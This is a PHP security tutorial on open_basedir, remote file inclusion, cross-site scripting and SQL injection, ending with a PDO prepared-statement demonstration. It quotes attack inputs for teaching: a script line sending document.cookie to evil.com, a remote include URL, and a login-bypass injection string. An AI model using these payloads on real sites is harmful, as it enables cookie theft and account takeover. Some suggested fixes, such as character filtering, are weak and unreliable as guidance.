From a quick Baidu search: once open_basedir is set, only PHP scripts in the specified directories and their subdirectories will be executed.
Using PHP to read directories or files outside open_basedir raises an insufficient-permissions error.
Virtual hosting providers generally set it to /tmp and /home.
This comes down to user habits, and we have to find a way to solve these problems. The following sums up some PHP security issues.
1. With include, be careful to check that the file actually exists locally, so as not to create a security vulnerability.
For example:
The code is as follows:
<?php include $module . '.php'; ?>
This assumes that $module is a global variable.
This script gives an attacker the opportunity to execute arbitrary PHP code on your server, for example by appending module=http://example.com/my to the URL in the browser. When PHP receives this URL, the value of the "$module" variable in the script is set to http://example.com/my, so it is dangerous when PHP executes the include ...
Workaround: turn off register_globals in php.ini, or check the value before the include.
The code is as follows:
<?php if (file_exists($module . '.php')) { include $module . '.php'; } ?>
2. Cross-site scripting.
Simply put, attackers can execute client-side scripts, such as JS, in the user's browser, and then steal cookies or other important data from users.
For example:
<script language='JavaScript'>document.location='http://evil.com/cgi-bin/cookie.cgi?f='+document.cookie</script>
If you click on the button, your local cookie information will be sent to someone's mailbox (this shows how easy it is to make a website that steals user information).
3. SQL injection
Personally, I feel that SQL's own flexibility and ease of use are what bring about its negative side.
The code is as follows:
<?php $query = "select login_id from users where user='$user' and pwd='$pw'"; mysql_query($query); ?>
Suppose someone requests
http://example.com/login.php?user=admin'%20or%20(user='&pwd=')%20or%20user='
Your PHP code may then become:
The code is as follows:
<?php $query = "select login_id from users where user='admin' or (user='' and pwd='') or user=''"; mysql_query($query); ?>
You can filter the input with a function, filtering out ('), ("), () and so on.
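The following is an added example, not code from the original article. It runs the user and pwd values from the URL above against the concatenated query and against a prepared statement: the concatenated query returns the admin row without a valid password, while the prepared statement treats both values as plain strings and matches nothing. It assumes PDO with an in-memory SQLite database in place of mysql_query, and the table contents and function names are constructed for the demonstration.

```php
<?php
// Added example: constructed table and credentials, not from the original page.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (login_id INTEGER PRIMARY KEY, user TEXT, pwd TEXT)");
$db->exec("INSERT INTO users (user, pwd) VALUES
           ('admin', 'constructed-secret-1'), ('bob', 'constructed-secret-2')");

// The values PHP decodes from the query string shown in the article.
$user = "admin' or (user='";
$pw   = "') or user='";

// Vulnerable form: request input is concatenated into the SQL text,
// so quotes in the input change the structure of the WHERE clause.
function login_concat(PDO $db, string $user, string $pw): array
{
    $query = "select login_id from users where user='$user' and pwd='$pw'";
    return $db->query($query)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the statement is fixed and the input is bound to
// placeholders, so it is only ever compared as data.
// (pwd is compared in SQL only to mirror the article's query.)
function login_prepared(PDO $db, string $user, string $pw): array
{
    $stmt = $db->prepare(
        'select login_id from users where user = :user and pwd = :pw'
    );
    $stmt->execute([':user' => $user, ':pw' => $pw]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

echo "concatenated query, injected input:\n";
var_dump(login_concat($db, $user, $pw));

echo "prepared statement, injected input:\n";
var_dump(login_prepared($db, $user, $pw));

echo "prepared statement, legitimate login:\n";
var_dump(login_prepared($db, 'admin', 'constructed-secret-1'));
```

Bound parameters remove the need to strip quotes and parentheses from input, which a character filter can miss or over-apply to legitimate values.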